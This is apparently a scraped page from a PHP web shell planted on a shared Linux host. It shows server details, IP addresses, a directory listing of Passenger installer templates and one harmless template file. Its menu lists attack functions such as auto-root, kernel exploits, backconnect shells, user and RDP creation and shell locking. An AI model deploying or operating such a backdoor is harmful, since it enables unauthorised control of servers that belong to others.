Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
passenger /
templates /
installer_common /
[ HOME SHELL ]
Name
Size
Permission
Action
cannot_access_files_as_root.tx...
728
B
-rw-r--r--
gem_install_permission_problem...
739
B
-rw-r--r--
low_amount_of_memory_warning.t...
1000
B
-rw-r--r--
run_installer_as_root.txt.erb
552
B
-rw-r--r--
world_inaccessible_directories...
663
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gem_install_permission_problems.txt.erb
<red>Permission problems in your gem directory detected</red> Your gem directory is <%= Gem.dir %>, and the files within are supposed to be owned by the '<%= `whoami`.strip %>' user. However, it looks like you installed the Phusion Passenger gem with 'sudo', causing some files within to be owned by the 'root' user. This will cause permission problems later on. Please run the following command to fix the permissions: <b>sudo chown -R <%= `whoami`.strip %> "<%= Gem.dir %>"</b> Also, please remember to run 'gem install' commands <b>without sudo</b> in the future. Sudo is only necessary if the gem directory is located outside the home directory. After having fixed the permissions, please <yellow>re-run this installer</yellow>.
Close